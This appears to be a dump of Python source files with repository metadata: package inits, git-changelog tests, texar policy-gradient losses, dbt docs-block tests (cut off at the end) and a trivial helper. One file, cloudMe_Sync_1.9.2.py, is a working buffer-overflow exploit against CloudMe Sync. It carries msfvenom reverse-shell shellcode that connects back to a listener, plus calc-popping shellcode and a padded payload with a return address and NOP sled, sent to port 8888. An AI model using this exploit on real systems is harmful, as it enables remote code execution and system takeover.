| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0.5
| 12
| 2
| 6
| 6
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a0844c83e0a2a558915b116898eb0f41af79887
| 45
|
py
|
Python
|
pystitch/__init__.py
|
dwallace0723/pystitch
|
77b609735cf399d4bd4f3fe3018e8005f4f0fe18
|
[
"MIT"
] | 2
|
2019-10-28T15:23:24.000Z
|
2021-02-24T09:13:19.000Z
|
pystitch/__init__.py
|
dwallace0723/pystitch
|
77b609735cf399d4bd4f3fe3018e8005f4f0fe18
|
[
"MIT"
] | 1
|
2021-06-01T23:53:48.000Z
|
2021-06-01T23:53:48.000Z
|
pystitch/__init__.py
|
dwallace0723/pystitch
|
77b609735cf399d4bd4f3fe3018e8005f4f0fe18
|
[
"MIT"
] | 1
|
2020-05-25T11:06:25.000Z
|
2020-05-25T11:06:25.000Z
|
from pystitch.client import PyStitch # noqa
| 22.5
| 44
| 0.8
| 6
| 45
| 6
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 1
| 45
| 45
| 0.947368
| 0.088889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6a12b94a35a7c57f7341646a6a296029ca61755f
| 1,768
|
py
|
Python
|
tests/test_angular_style.py
|
rainchen/git-changelog
|
0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6
|
[
"ISC"
] | 1
|
2019-11-28T15:20:31.000Z
|
2019-11-28T15:20:31.000Z
|
tests/test_angular_style.py
|
LoicViennois/git-changelog
|
0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6
|
[
"ISC"
] | null | null | null |
tests/test_angular_style.py
|
LoicViennois/git-changelog
|
0204c7ab5d9e6682a94d3842df3e16cb19bd3ee6
|
[
"ISC"
] | null | null | null |
from git_changelog.build import Commit
from git_changelog.style import AngularStyle
def test_angular_style_breaking_change():
subject = "feat: this is a new breaking feature"
body = ["BREAKING CHANGE: there is a breaking feature in this code"]
commit = Commit(hash="aaaaaaa", subject=subject, body=body, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_breaking_changes():
subject = "feat: this is a new breaking feature"
body = ["BREAKING CHANGES: there is a breaking feature in this code"]
commit = Commit(hash="aaaaaaa", subject=subject, body=body, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_feat():
subject = "feat: this is a new feature"
commit = Commit(hash="aaaaaaa", subject=subject, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert not commit_dict["is_major"]
assert commit_dict["is_minor"]
assert not commit_dict["is_patch"]
def test_angular_style_fix():
subject = "fix: this is a bug fix"
commit = Commit(hash="aaaaaaa", subject=subject, author_date="1574340645", committer_date="1574340645")
style = AngularStyle()
commit_dict = style.parse_commit(commit)
assert not commit_dict["is_major"]
assert not commit_dict["is_minor"]
assert commit_dict["is_patch"]
| 39.288889
| 118
| 0.734163
| 238
| 1,768
| 5.218487
| 0.168067
| 0.128824
| 0.115942
| 0.122383
| 0.877617
| 0.849436
| 0.832528
| 0.832528
| 0.832528
| 0.832528
| 0
| 0.053908
| 0.160633
| 1,768
| 44
| 119
| 40.181818
| 0.783019
| 0
| 0
| 0.666667
| 0
| 0
| 0.248869
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a253ca6dd135c4ece905fbd3e11a57d21e86625
| 65
|
py
|
Python
|
venv/my_power.py
|
Good-Gulf/power_new
|
ef74c35ea4a5f64da90dc930858aad059ddac2de
|
[
"MIT"
] | null | null | null |
venv/my_power.py
|
Good-Gulf/power_new
|
ef74c35ea4a5f64da90dc930858aad059ddac2de
|
[
"MIT"
] | null | null | null |
venv/my_power.py
|
Good-Gulf/power_new
|
ef74c35ea4a5f64da90dc930858aad059ddac2de
|
[
"MIT"
] | null | null | null |
def my_power(basis,exponent):
return basis*exponent
pass
| 16.25
| 29
| 0.723077
| 9
| 65
| 5.111111
| 0.777778
| 0.565217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 65
| 4
| 30
| 16.25
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
6a313b304bdfac487df8d275f8ff3583f51b474a
| 127
|
py
|
Python
|
simpletransformers/multiav/__init__.py
|
g-simmons/simpletransformers
|
ffd3fd2f6e96d00fcfa934a36eed44d182d006db
|
[
"Apache-2.0"
] | null | null | null |
simpletransformers/multiav/__init__.py
|
g-simmons/simpletransformers
|
ffd3fd2f6e96d00fcfa934a36eed44d182d006db
|
[
"Apache-2.0"
] | null | null | null |
simpletransformers/multiav/__init__.py
|
g-simmons/simpletransformers
|
ffd3fd2f6e96d00fcfa934a36eed44d182d006db
|
[
"Apache-2.0"
] | null | null | null |
from simpletransformers.config.model_args import MultiAVArgs
from simpletransformers.multiav.multiav_model import MultiAVModel
| 42.333333
| 65
| 0.905512
| 14
| 127
| 8.071429
| 0.642857
| 0.389381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 127
| 2
| 66
| 63.5
| 0.94958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6a33b4b693b804b736d9dec2a6cfb3c02fdb26a5
| 47
|
py
|
Python
|
plotting/data_extractor/extraction_utils/scatter_utils.py
|
eric-erki/GISportal
|
407764334b3ba50da4429fc170b98e20468ff8a0
|
[
"Apache-2.0"
] | 55
|
2015-03-20T23:54:17.000Z
|
2022-01-22T04:33:06.000Z
|
plotting/data_extractor/extraction_utils/scatter_utils.py
|
eric-erki/GISportal
|
407764334b3ba50da4429fc170b98e20468ff8a0
|
[
"Apache-2.0"
] | 27
|
2016-03-14T15:44:05.000Z
|
2021-09-03T10:23:06.000Z
|
plotting/data_extractor/extraction_utils/scatter_utils.py
|
eric-erki/GISportal
|
407764334b3ba50da4429fc170b98e20468ff8a0
|
[
"Apache-2.0"
] | 24
|
2015-03-11T14:59:24.000Z
|
2022-03-31T10:47:17.000Z
|
def test_time_axis(filenames):
return "hmmmm"
| 15.666667
| 30
| 0.787234
| 7
| 47
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 47
| 2
| 31
| 23.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
dbe5f09427725d1e220d3ced8c439d736c3f6db6
| 11,546
|
py
|
Python
|
texar/losses/pg_losses.py
|
Holmeswww/Text_Infilling
|
f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3
|
[
"Apache-2.0"
] | 25
|
2019-01-03T09:15:20.000Z
|
2022-02-12T04:20:59.000Z
|
texar/losses/pg_losses.py
|
Holmeswww/Text_Infilling
|
f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3
|
[
"Apache-2.0"
] | 4
|
2019-03-28T11:02:20.000Z
|
2022-02-15T04:57:33.000Z
|
texar/losses/pg_losses.py
|
Holmeswww/Text_Infilling
|
f63cd24bee5c62d7dedd8fb35c4e52aee20c39f3
|
[
"Apache-2.0"
] | 9
|
2019-01-03T02:20:37.000Z
|
2022-02-12T04:20:50.000Z
|
#
"""
Various loss functions for policy gradients.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from texar.losses.losses_utils import mask_and_reduce
from texar.utils.shapes import get_rank
# pylint: disable=too-many-arguments, protected-access
__all__ = [
"pg_loss_with_logits",
"pg_loss_with_log_probs"
]
def pg_loss_with_logits(actions,
logits,
advantages,
rank=None,
batched=False,
sequence_length=None,
average_across_batch=True,
average_across_timesteps=False,
average_across_remaining=False,
sum_over_batch=False,
sum_over_timesteps=True,
sum_over_remaining=True,
time_major=False):
"""Policy gradient loss with logits. Used for discrete actions.
pg_loss = reduce( advantages * -log_prob( actions ) ),
where `advantages` and `actions` will not bprop gradients.
All arguments except :attr:`logits` and :attr:`actions` are the same as
:func:`pg_loss_with_log_probs`.
Args:
actions: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and of dtype
`int32` or `int64`.
The rank of the Tensor is specified with :attr:`rank`.
The batch dimension exists only if :attr:`batched` is `True`.
The batch and time dimensions
are exchanged, i.e., `[max_time, batch_size, ...]` if
:attr:`time_major` is `True`.
logits: Unscaled log probabilities of shape
`[(batch_size,) max_time, d_3, ..., d_{rank+1}]`
and dtype `float32` or `float64`.
The batch and time dimensions are exchanged if :attr:`time_major`
is `True`.
advantages: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and
dtype `float32` or `float64`.
The batch and time dimensions are exchanged if :attr:`time_major`
is `True`.
rank (int, optional): The rank of :attr:`actions`.
If `None` (default), rank is automatically inferred from
:attr:`actions` or :attr:`advantages`. If the inferred rank is
`None`, :attr:`rank` is set to 1 if :attr:`batched` is `False`,
and :attr:`rank`=2 if :attr:`batched` is `True`.
batched (bool): `True` if the inputs are batched.
sequence_length (optional): A Tensor of shape `[batch_size]`.
Time steps beyond the respective sequence lengths will have zero
losses. Used if :attr:`batched` is `True`.
average_across_timesteps (bool): If set, average the loss across
the time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
average_across_batch (bool): If set, average the loss across the
batch dimension. Must not set :attr:`average_across_batch`'
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
average_across_remaining (bool): If set, average the sequence across the
remaining dimensions. Must not set :attr:`average_across_remaining`'
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
sum_over_timesteps (bool): If set, sum the loss across the
time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
sum_over_batch (bool): If set, sum the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
sum_over_remaining (bool): If set, sum the loss across the
remaining dimension. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
time_major (bool): The shape format of the inputs. If `True`,
:attr:`logits`, :attr:`actions` and :attr:`advantages` must
have shape `[max_time, batch_size, ...]`. If `False` (default),
they must have shape `[batch_size, max_time, ...]`.
Ignored if :attr:`batched` is `False`.
Returns:
A Tensor containing the loss to minimize, whose rank depends on the
reduce arguments. For example, the batch dimension is reduced if
either :attr:`average_across_batch` or :attr:`sum_over_batch` is
`True`, which makes the rank of output tensor decrease by 1.
"""
actions = tf.stop_gradient(actions)
neg_log_probs = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=actions)
return pg_loss_with_log_probs(
log_probs=-neg_log_probs,
advantages=advantages,
rank=rank,
batched=batched,
sequence_length=sequence_length,
average_across_batch=average_across_batch,
average_across_timesteps=average_across_timesteps,
average_across_remaining=average_across_remaining,
sum_over_batch=sum_over_batch,
sum_over_timesteps=sum_over_timesteps,
sum_over_remaining=sum_over_remaining,
time_major=time_major)
def pg_loss_with_log_probs(log_probs,
advantages,
rank=None,
batched=False,
sequence_length=None,
average_across_batch=True,
average_across_timesteps=False,
average_across_remaining=False,
sum_over_batch=False,
sum_over_timesteps=True,
sum_over_remaining=True,
time_major=False):
"""Policy gradient loss with log probs of actions.
pg_loss = reduce( advantages * -log_probs ),
where `advantages` will not bprop gradients.
All arguments except :attr:`log_probs` are the same as
:func:`pg_loss_with_logits`.
Args:
log_probs: Log probabilities of shape
`[(batch_size,) max_time, ..., d_rank]` and dtype `float32`
or `float64`. The rank of the Tensor is specified
with :attr:`rank`.
The batch dimension exists only if :attr:`batched` is `True`.
The batch and time dimensions are exchanged, i.e.,
`[max_time, batch_size, ...]` if :attr:`time_major` is `True`.
advantages: Tensor of shape
`[(batch_size,) max_time, d_3, ..., d_rank]` and
dtype `float32` or `float64`.
The batch dimension exists only if
:attr:`batched` is `True`.
The batch and time dimensions
are exchanged, i.e., `[max_time, batch_size, ...]` if
:attr:`time_major` is `True`.
rank (int, optional): The rank of :attr:`log_probs`.
If `None` (default), rank is automatically inferred from
:attr:`log_probs` or :attr:`advantages`. If the inferred rank is
`None`, :attr:`rank` is set to 1 if :attr:`batched``==False`,
and :attr:`rank`=2 if :attr:`batched``==True`.
batched (bool): `True` if the inputs are batched.
sequence_length (optional): A Tensor of shape `[batch_size]`.
Time steps beyond the respective sequence lengths will have zero
losses. Used if :attr:`batched` is `True`.
average_across_timesteps (bool): If set, average the loss across
the time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
average_across_batch (bool): If set, average the loss across the
batch dimension. Must not set :attr:`average_across_batch`'
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
average_across_remaining (bool): If set, average the sequence across the
remaining dimensions. Must not set :attr:`average_across_remaining`'
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
sum_over_timesteps (bool): If set, sum the loss across the
time dimension. Must not set :attr:`average_across_timesteps`
and :attr:`sum_over_timesteps` at the same time.
sum_over_batch (bool): If set, sum the loss across the
batch dimension. Must not set :attr:`average_across_batch`
and :attr:`sum_over_batch` at the same time.
Ignored if :attr:`batched` is `False`.
sum_over_remaining (bool): If set, sum the loss across the
remaining dimension. Must not set :attr:`average_across_remaining`
and :attr:`sum_over_remaining` at the same time. Ignored if
no more dimensions other than the batch and time dimensions.
time_major (bool): The shape format of the inputs. If `True`,
:attr:`log_probs` and :attr:`advantages` must have shape
`[max_time, batch_size, ...]`. If `False` (default),
they must have shape `[batch_size, max_time, ...]`.
Ignored if :attr:`batched` is `False`.
Returns:
A Tensor containing the loss to minimize, whose rank depends on the
reduce arguments. For example, the batch dimension is reduced if
either :attr:`average_across_batch` or :attr:`sum_over_batch` is
`True`, which makes the rank of output tensor decrease by 1.
"""
advantages = tf.stop_gradient(advantages)
losses = -log_probs * advantages
if rank is None:
rank = get_rank(log_probs) or get_rank(advantages)
if rank is None:
rank = 2 if batched else 1
if batched:
losses = mask_and_reduce(
losses,
sequence_length,
rank=rank,
average_across_batch=average_across_batch,
average_across_timesteps=average_across_timesteps,
average_across_remaining=average_across_remaining,
sum_over_batch=sum_over_batch,
sum_over_timesteps=sum_over_timesteps,
sum_over_remaining=sum_over_remaining,
time_major=time_major)
elif rank > 1:
if average_across_remaining and sum_over_remaining:
raise ValueError("Only one of `average_across_remaining` and "
"`sum_over_remaining` can be set.")
if average_across_remaining:
losses = tf.reduce_mean(losses, axis=range(1, rank))
elif sum_over_remaining:
losses = tf.reduce_sum(losses, axis=range(1, rank))
if not batched:
if average_across_timesteps and sum_over_timesteps:
raise ValueError("Only one of `average_across_timesteps` and "
"`sum_over_timesteps` can be set.")
if average_across_timesteps:
losses = tf.reduce_mean(losses)
elif sum_over_timesteps:
losses = tf.reduce_mean(losses)
return losses
| 46.369478
| 80
| 0.619955
| 1,460
| 11,546
| 4.690411
| 0.106849
| 0.083528
| 0.048189
| 0.028475
| 0.857331
| 0.84448
| 0.811186
| 0.772634
| 0.739632
| 0.717436
| 0
| 0.00444
| 0.297679
| 11,546
| 248
| 81
| 46.556452
| 0.840054
| 0.63797
| 0
| 0.488372
| 0
| 0
| 0.052314
| 0.020268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.069767
| 0
| 0.116279
| 0.011628
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
dbef8fb08525da309f4d6673d407a423e1cee964
| 46
|
py
|
Python
|
sparkmagic/sparkmagic/kernels/__init__.py
|
sciserver/sparkmagic
|
ac0852cbe88a41faa368cf1e1c89045a2de973bf
|
[
"RSA-MD"
] | 1,141
|
2015-09-21T20:52:00.000Z
|
2022-03-31T14:15:51.000Z
|
sparkmagic/sparkmagic/kernels/__init__.py
|
sciserver/sparkmagic
|
ac0852cbe88a41faa368cf1e1c89045a2de973bf
|
[
"RSA-MD"
] | 605
|
2015-09-23T23:27:43.000Z
|
2022-03-16T07:46:52.000Z
|
sparkmagic/sparkmagic/kernels/__init__.py
|
sciserver/sparkmagic
|
ac0852cbe88a41faa368cf1e1c89045a2de973bf
|
[
"RSA-MD"
] | 442
|
2015-09-23T21:31:28.000Z
|
2022-03-13T15:19:57.000Z
|
from sparkmagic.kernels.kernelmagics import *
| 23
| 45
| 0.847826
| 5
| 46
| 7.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e01fa75a7a3b66decda4761b660f6b0b66fd1a1c
| 2,999
|
py
|
Python
|
codes/cloudMe_Sync_1.9.2.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 18
|
2019-04-11T02:27:07.000Z
|
2022-01-24T09:53:13.000Z
|
codes/cloudMe_Sync_1.9.2.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | null | null | null |
codes/cloudMe_Sync_1.9.2.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 11
|
2019-04-03T12:15:45.000Z
|
2022-03-23T15:02:32.000Z
|
#!/usr/bin/python
# tested on windows 7 x86 sp1
import socket
import struct
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=1990 -b "\x00\x0a\x0d" -f python -v shellcode
shellcode = ""
shellcode += "\xdb\xd8\xd9\x74\x24\xf4\xbd\x66\xdc\x28\xe4\x5e"
shellcode += "\x33\xc9\xb1\x52\x31\x6e\x17\x03\x6e\x17\x83\xa0"
shellcode += "\xd8\xca\x11\xd0\x09\x88\xda\x28\xca\xed\x53\xcd"
shellcode += "\xfb\x2d\x07\x86\xac\x9d\x43\xca\x40\x55\x01\xfe"
shellcode += "\xd3\x1b\x8e\xf1\x54\x91\xe8\x3c\x64\x8a\xc9\x5f"
shellcode += "\xe6\xd1\x1d\xbf\xd7\x19\x50\xbe\x10\x47\x99\x92"
shellcode += "\xc9\x03\x0c\x02\x7d\x59\x8d\xa9\xcd\x4f\x95\x4e"
shellcode += "\x85\x6e\xb4\xc1\x9d\x28\x16\xe0\x72\x41\x1f\xfa"
shellcode += "\x97\x6c\xe9\x71\x63\x1a\xe8\x53\xbd\xe3\x47\x9a"
shellcode += "\x71\x16\x99\xdb\xb6\xc9\xec\x15\xc5\x74\xf7\xe2"
shellcode += "\xb7\xa2\x72\xf0\x10\x20\x24\xdc\xa1\xe5\xb3\x97"
shellcode += "\xae\x42\xb7\xff\xb2\x55\x14\x74\xce\xde\x9b\x5a"
shellcode += "\x46\xa4\xbf\x7e\x02\x7e\xa1\x27\xee\xd1\xde\x37"
shellcode += "\x51\x8d\x7a\x3c\x7c\xda\xf6\x1f\xe9\x2f\x3b\x9f"
shellcode += "\xe9\x27\x4c\xec\xdb\xe8\xe6\x7a\x50\x60\x21\x7d"
shellcode += "\x97\x5b\x95\x11\x66\x64\xe6\x38\xad\x30\xb6\x52"
shellcode += "\x04\x39\x5d\xa2\xa9\xec\xf2\xf2\x05\x5f\xb3\xa2"
shellcode += "\xe5\x0f\x5b\xa8\xe9\x70\x7b\xd3\x23\x19\x16\x2e"
shellcode += "\xa4\xe6\x4f\x30\x23\x8f\x8d\x30\x5a\x14\x1b\xd6"
shellcode += "\x36\xba\x4d\x41\xaf\x23\xd4\x19\x4e\xab\xc2\x64"
shellcode += "\x50\x27\xe1\x99\x1f\xc0\x8c\x89\xc8\x20\xdb\xf3"
shellcode += "\x5f\x3e\xf1\x9b\x3c\xad\x9e\x5b\x4a\xce\x08\x0c"
shellcode += "\x1b\x20\x41\xd8\xb1\x1b\xfb\xfe\x4b\xfd\xc4\xba"
shellcode += "\x97\x3e\xca\x43\x55\x7a\xe8\x53\xa3\x83\xb4\x07"
shellcode += "\x7b\xd2\x62\xf1\x3d\x8c\xc4\xab\x97\x63\x8f\x3b"
shellcode += "\x61\x48\x10\x3d\x6e\x85\xe6\xa1\xdf\x70\xbf\xde"
shellcode += "\xd0\x14\x37\xa7\x0c\x85\xb8\x72\x95\xb5\xf2\xde"
shellcode += "\xbc\x5d\x5b\x8b\xfc\x03\x5c\x66\xc2\x3d\xdf\x82"
shellcode += "\xbb\xb9\xff\xe7\xbe\x86\x47\x14\xb3\x97\x2d\x1a"
shellcode += "\x60\x97\x67"
# pop calc.exe
shellcode = "\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
shellcode += "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
shellcode += "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
shellcode += "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
shellcode += "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
shellcode += "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
shellcode += "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC"
payload = "A" * 1036 + '\x25\xDF\xB8\x68' + "\x90" * 16 + shellcode
try:
print "\nSending tons of random bytes..."
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('192.168.0.27', 8888))
client.send(payload)
client.close()
print "\nDone! Wonder if we got that shell back?"
except:
print "Could not connect to 8888 for some reason..."
| 49.163934
| 110
| 0.697232
| 580
| 2,999
| 3.598276
| 0.472414
| 0.01725
| 0.006708
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219336
| 0.075692
| 2,999
| 60
| 111
| 49.983333
| 0.53355
| 0.055352
| 0
| 0
| 0
| 0.72
| 0.686815
| 0.629198
| 0.02
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.04
| null | null | 0.06
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e02e258399fee69d4d68bcdabb98b634c7dc4ea6
| 5,052
|
py
|
Python
|
test/integration/035_docs_blocks/test_docs_blocks.py
|
vogt4nick/dbt
|
1bd82d4914fd80fcc6fe17140e46554ad677eab0
|
[
"Apache-2.0"
] | 1
|
2021-04-08T03:33:33.000Z
|
2021-04-08T03:33:33.000Z
|
test/integration/035_docs_blocks/test_docs_blocks.py
|
azhard/dbt
|
9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55
|
[
"Apache-2.0"
] | 1
|
2021-04-30T21:33:11.000Z
|
2021-04-30T21:33:11.000Z
|
test/integration/035_docs_blocks/test_docs_blocks.py
|
azhard/dbt
|
9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55
|
[
"Apache-2.0"
] | 1
|
2021-02-25T13:47:29.000Z
|
2021-02-25T13:47:29.000Z
|
import json
import os
from test.integration.base import DBTIntegrationTest, use_profile
import dbt.exceptions
class TestGoodDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("models")
@use_profile('postgres')
def test_postgres_valid_doc_ref(self):
self.assertEqual(len(self.run_dbt()), 1)
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
model_data = manifest['nodes']['model.test.model']
self.assertEqual(
model_data['description'],
'My model is just a copy of the seed'
)
self.assertEqual(
{
'name': 'id',
'description': 'The user ID number',
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['id']
)
self.assertEqual(
{
'name': 'first_name',
'description': "The user's first name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['first_name']
)
self.assertEqual(
{
'name': 'last_name',
'description': "The user's last name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['last_name']
)
self.assertEqual(len(model_data['columns']), 3)
@use_profile('postgres')
def test_postgres_alternative_docs_path(self):
self.use_default_project({"docs-paths": [self.dir("docs")]})
self.assertEqual(len(self.run_dbt()), 1)
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
model_data = manifest['nodes']['model.test.model']
self.assertEqual(
model_data['description'],
'Alt text about the model'
)
self.assertEqual(
{
'name': 'id',
'description': 'The user ID number with alternative text',
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['id']
)
self.assertEqual(
{
'name': 'first_name',
'description': "The user's first name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['first_name']
)
self.assertEqual(
{
'name': 'last_name',
'description': "The user's last name in this other file",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['last_name']
)
self.assertEqual(len(model_data['columns']), 3)
@use_profile('postgres')
def test_postgres_alternative_docs_path_missing(self):
self.use_default_project({"docs-paths": [self.dir("not-docs")]})
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt()
class TestMissingDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("missing_docs_models")
@use_profile('postgres')
def test_postgres_missing_doc_ref(self):
# The run should fail since we could not find the docs reference.
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt()
class TestBadDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("invalid_name_models")
@use_profile('postgres')
def test_postgres_invalid_doc_ref(self):
# The run should fail since we could not find the docs reference.
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt(expect_pass=False)
class TestDuplicateDocsBlock(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
